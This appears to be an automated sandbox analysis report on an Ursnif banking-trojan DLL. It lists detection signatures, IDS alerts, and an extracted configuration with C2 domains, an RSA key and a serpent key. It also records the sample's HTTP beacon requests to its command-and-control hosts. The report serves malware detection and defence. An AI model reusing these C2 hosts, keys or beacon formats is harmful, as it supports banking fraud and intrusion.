Windows Analysis Report beneficial.dll

Overview

General Information

Sample Name: beneficial.dll
Analysis ID: 456598
MD5: 631779ef3aecb4838360304f162dbd8c
SHA1: 9103735e9771b40fb26b5b273683934dfea38402
SHA256: a4c7d46ab94add85adc74f9686c7367fd82eaae508b3e2227db8e62930fb3da0
Tags: dll
Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/5QxR3u9Oxc2/66JuutLFo4_2BN/FYPvHdZdpqBBUlII8YbkV/HeRpg9bicXJHtfwV/D4QIfvz6kYooZLO/cw4gCcjcoRxS01qkn1/EW0Ez7bVC/W7k8iaBQuoYhbKZqLnrE/RbmpYueuIODfoh6oP2l/c8Ac2bwpliTaTSR56vdGwk/ZRQxemEpvF2A8/99lPQg9V/lwEJF2LaR_2FZsZYxJbXRUs/6u5PpA2s_2/FPyKVp1yfx9FnP4nW/L_2Fr3MO_2By/WnKnaVSLrhm/N0Y4cK91iRGQ0B/oWkJGcqoY10Xhf8Gg076m/Kf5Jj7Gzg1x_2BtG/X7PsvIId3dQ8Qbd/BbiLQ_2F/U Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000003.289406918.0000000002D90000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 7%
Source: app.flashgameo.at Virustotal: Detection: 11%
Multi AV Scanner detection for submitted file
Source: beneficial.dll Virustotal: Detection: 7%

Compliance:

Uses 32bit PE files
Source: beneficial.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.393718546.000002846EF00000.00000002.00000001.sdmp, csc.exe, 0000001B.00000002.408584301.00000220E4530000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.427307077.0000022082640000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdbXP source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdbXP source: powershell.exe, 0000001A.00000002.543371423.000001DB0CC7E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdb8 source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: loaddll32.exe, 00000000.00000002.484513527.000000006E279000.00000002.00020000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdb8 source: powershell.exe, 0000001A.00000002.543279635.000001DB0CC3E000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04860F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04860F53
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0484CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04859386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_04859386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053E0F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053D9386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053CCA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04846457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_04846457

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49725 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49729 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49729 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49730 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49730 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49747 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49747 -> 185.228.233.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU ITOS-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /nXPlpJzbYjr74CTZyDzC/D9p7qOvHIUeaU5l5TWg/ZWUyp43sRXohtYVKqrN9BG/mDv4tDjcpen2y/vY_2BHuQ/74VicVpMxGX7XEuVSEs9P9C/rwR9QPDbqk/2qg_2FzIToR0YDTQN/nBMnf5keCaSk/WfxjKAafipS/yOngqQcB50LuwQ/Rbr2UaT2ic94OGNOmzJNW/ahzfbT2UaCp9En3m/nlCEAERonIRNNPZ/2Bo61_2Bo91_2BDafA/PFOPXJrOm/sjmvEQ2K2JDMfwJnFVMx/4z3kMl9gFa3Esr_2FSM/Pzl4b_2BiQbP02e2DJWYiz/yyvN7kRDoLRYu/Uzfpbij_/2FlM HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /5QxR3u9Oxc2/66JuutLFo4_2BN/FYPvHdZdpqBBUlII8YbkV/HeRpg9bicXJHtfwV/D4QIfvz6kYooZLO/cw4gCcjcoRxS01qkn1/EW0Ez7bVC/W7k8iaBQuoYhbKZqLnrE/RbmpYueuIODfoh6oP2l/c8Ac2bwpliTaTSR56vdGwk/ZRQxemEpvF2A8/99lPQg9V/lwEJF2LaR_2FZsZYxJbXRUs/6u5PpA2s_2/FPyKVp1yfx9FnP4nW/L_2Fr3MO_2By/WnKnaVSLrhm/N0Y4cK91iRGQ0B/oWkJGcqoY10Xhf8Gg076m/Kf5Jj7Gzg1x_2BtG/X7PsvIId3dQ8Qbd/BbiLQ_2F/U HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /P0jjO0xbOKcAJnGxIQOpo8/gKFtB_2Buq45i/OUi2Zqz_/2FXJhzSc5467S5cZtZCLfzw/WEn4WhbpR0/Ng4RE8DuDkec9tVF6/wLVORM0Uhp_2/BfCZjrl0dTQ/CA55efyHBHehFo/_2FegAa01sqcFDRw5Xb_2/BrtEaQdz7xZ_2F_2/BnevtS7ClgdhmDd/g09o5TUBS6V_2FoRMW/5ZLb_2FLO/hJUn0eVYDRnaPp3KQLYb/o5eYsU0tyaqUpedv0zC/VnSlyd0WZv1NgQoOuUsvzi/x9IipKWe7L3yQ/xurRoB1F/hG1qpWATHDMPuEfwEB6M_2F/cExPZ_2BRD/oJ0kYINluT2Ckx0_2/Fo7 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /uvtPicnEF3ayZfNSduh1Odo/x80rwZaWjR/sjHY9dp1ZS2QpXbNd/fR3UvK_2FuFi/ra5JXB9aYjU/sjgtwpw9Z1TyDV/wTK0lzhdRABRAVrOUQDt6/1m0O51Kc1fEtP9UV/MFlFU_2FdH4xZg5/PVbHPy2QqeBLJ2kXpN/JWlsnfVtg/sJdHnpc8JO8gIKGisB8u/29Sp2slxdCuDaeXjYLe/0pm7DRZxlVHk6a9GRasNhz/GdheCQnIFhW6C/_2BW_2F_/2BtOkYFrX0LfxIkXFcw45MF/LMmU5JuPYf/aocoBw1uMCqxI3p6s/DEfR1YiYc/Cu HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /oRH66S9974RVngrSWr_2FIv/PVFALrkG2I/Wnbzx3nHyPhGJ_2B0/lDZhPCm2vL8u/oMKeAaHPz5X/8Nl4L_2FNUoyc7/Jy8VIA7fHQqF7XiUI3Ff0/B3o6Eb6xtvEpbNMf/eqW1D785SCJyaXo/RVYKns_2FtN1yOn2Tk/HQ1DP9wHv/HsxMoHg0IyrvqonmdBdX/B_2B2sKeb9av7332HDx/1qSsk7BU_2BrcP7KNB8WRt/GGl7pCxp7fqEA/vqK79G1k/N8_2Fi0gh099LJYwx9ArNcx/2wmhsNP_2B/QSMxEp15aE25fwoCU/99RYkM0_2FJd/tiDhnbU42KQ/MjCgTagS/90K5WUpg/z HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /XD_2FGfGJryOnwqjG8zwl2B/USybsgcvex/jHVSMHDNCXrb6M6Tn/OhzcRPXSdY_2/BR1XyvU4uec/IJ3dNpaPhK5MqX/ZM_2BSwM62CY_2FjUJgfJ/ze_2BQkuaq8YSgC5/aHRIoH_2BZK1llG/5xUZmiZxkordzJYt_2/BWewe7iPW/UxaPfU_2Fqwz0lUddjXp/k5hsOkYd2p1zIu4wpac/kMY7yVFRd1MSAckCp3YJiQ/3YaUS09w_2Bcq/C2xNv8cP/Jv26aAzCYt19auTI84Be0Xd/PaJL8SJ9gI/QhmoG3Rgaw7E6t8Zd/SRYCF7CuqAl3HZR/Fv_2FZ HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xLrZ8_2FAB_/2FR6_2Fu_2BaTb/5C0xlUV0a1z9g8JcSnrbc/zEmj_2FBKBeSMEdB/rpah9sEy05_2FMj/rgAemzqzwypRqSD3eM/ySehLjXGP/_2F2eaqjDNgoGOdY2xjO/lxujYqltab3Dgh1Vp4T/RNQ5Rf8S9BJak5pPf1FkxX/2auIjGjvaWnJH/suecnPKU/olT9tbEkXPnG8gDAitQyOg9/1DNb6hIlq6/OiafzFeAG90CnfWoP/W8OT_2FPGN41/y61_2BxGed4/Yzj6O0tW6lurQf/cIMHEq_2Fb3tO3ZabQx9l/ByrsZiIrbroNOxIz/RtnqStklGAPq7Xq/3Y7I2nWG867Sux/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Content-Length: 2
    Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Content-Length: 2
    Host: app.flashgameo.at
Source: loaddll32.exe, 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.507638380.00000000089F1000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000015.00000002.534867804.00000244953EE000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.523846280.000001DB08B7F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000015.00000002.507680880.0000024485391000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.522653108.000001DB08971000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.523846280.000001DB08B7F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.523846280.000001DB08B7F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.534867804.00000244953EE000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
